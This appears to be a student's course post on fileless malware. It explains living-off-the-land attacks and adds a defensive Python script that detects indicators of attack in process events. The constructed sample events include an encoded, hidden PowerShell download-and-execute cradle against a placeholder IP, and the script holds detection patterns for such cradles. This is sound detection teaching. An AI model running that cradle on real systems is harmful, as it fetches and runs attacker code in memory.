SH&NR Week 5 Posting - Fileless Malware
Fileless Malware
Traditional malware is meant to be downloaded to disk and then executed. Fileless malware never writes its payload to disk: the malicious code runs in memory and abuses programs that are already on the system, such as PowerShell or WMI, a technique CrowdStrike calls living off the land (LOTL). Because of this difference, the prevention, detection, and response methods must also be different to effectively combat fileless malware.
Fileless malware can get into a system the same way other malware can, for example when a user clicks a link or opens an attachment in a suspicious phishing email. While anti-virus and anti-spyware software are effective against traditional malware, fileless malware is not stopped as easily. A regular antivirus program may not be able to identify the threat because there is no anomalous file associated with it to scan (Fortinet).

Combating fileless malware therefore requires consistent monitoring of what is happening on the system. CrowdStrike and Fortinet recommend monitoring for indicators of attack (IOAs). IOAs are effective because they look for suspicious or malicious behaviour, such as an Office document spawning a command shell or a script that downloads and runs code directly in memory, rather than for a file that has been downloaded, which is what anti-malware software looks for. Another way to detect fileless malware is to hire a third-party provider to handle threat hunting. Threat hunting can be very involved and time-intensive, and hiring a provider takes that burden off the user or organization.

While threat detection differs, threat prevention should follow the same protocols as for traditional malware. Fileless malware means vulnerability scans are still worthwhile, since the attacker still needs a way in, and following malware mitigation best practices is still a great choice.
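To make the IOA idea concrete, here is an added example that is not part of the original post and is not code from CrowdStrike or Fortinet. It applies a few behavioural rules to process-creation events (constructed here to resemble Sysmon Event ID 1 or EDR telemetry) and never looks at a file hash. The rule names, process lists, regular expressions, and sample events are all assumptions made for the example; the one real detail is that PowerShell's -EncodedCommand argument is base64 over UTF-16LE, which is why the script decodes it before scanning.

```python
"""Behaviour-based (IOA) detection over constructed process-creation events.

Added example. The events, rule names and patterns below are assumptions
made for illustration and do not come from the cited CrowdStrike or
Fortinet pages.
"""
import base64
import re

# Parent processes that should rarely spawn a scripting host (assumed list).
OFFICE_AND_MAIL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Windows-native interpreters commonly abused for living-off-the-land execution.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line fragments typical of in-memory download-and-execute cradles.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"frombase64string|reflection\.assembly", re.I),
]
# PowerShell -EncodedCommand (and its short forms) followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Flags used to hide the window, skip the profile, or bypass execution policy.
STEALTH_FLAGS = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-(?:nop|noprofile)|-(?:ep|executionpolicy)\s+bypass", re.I)


def encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return the list of IOA findings for one process-creation event."""
    findings = []
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["command_line"]

    # Rule 1: a document-handling application launching a scripting host.
    if parent in OFFICE_AND_MAIL_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"office_spawns_script_host: {parent} -> {image}")

    # Rule 2: encoded PowerShell; decode it so later rules see the real script.
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_powershell_command")
    to_scan = cmdline if decoded is None else ENCODED_FLAG.sub(" ", cmdline) + " " + decoded

    # Rule 3: window-hiding / policy-bypass flags on the visible command line.
    if STEALTH_FLAGS.search(cmdline):
        findings.append("stealth_powershell_flags")

    # Rule 4: a script host whose (decoded) command line fetches and runs code in memory.
    if image in SCRIPT_HOSTS and any(p.search(to_scan) for p in CRADLE_PATTERNS):
        findings.append("in_memory_download_cradle")
    return findings


def detect(events):
    """Run analyse_event over a batch and return (pid, findings) for events that fired."""
    results = []
    for e in events:
        findings = analyse_event(e)
        if findings:
            results.append((e["pid"], findings))
    return results


# Constructed telemetry: one benign event, one phishing-style fileless chain,
# and one admin script run that only trips the weaker policy-bypass rule.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    {"pid": 2002, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -EncodedCommand "
                     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"pid": 3003, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, findings in detect(SAMPLE_EVENTS):
        print(pid, findings)
```

Run as a script it reports event 2002 with four findings and event 3003 with only the execution-policy flag. That difference is the practical point: a single weak signal such as -ExecutionPolicy Bypass is common in legitimate administration, while a Word process launching hidden, encoded PowerShell that pulls a script straight into memory stacks several IOAs and deserves an alert even though no malicious file was ever written to disk.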
References:
Baker, K. (2024, November 26). What is fileless malware? CrowdStrike. https://www.crowdstrike.com/en-us/cybersecurity-101/malware/fileless-malware/#:~:text=Unlike%20traditional%20malware%2C%20which%20typically,off%20the%20land%20(LOTL).
Fortinet. (n.d.). What is fileless malware? Examples, detection and prevention. https://www.fortinet.com/resources/cyberglossary/fileless-malware#:~:text=Fileless%20malware%20is%20malicious%20code,computer%20instead%20of%20malicious%20files.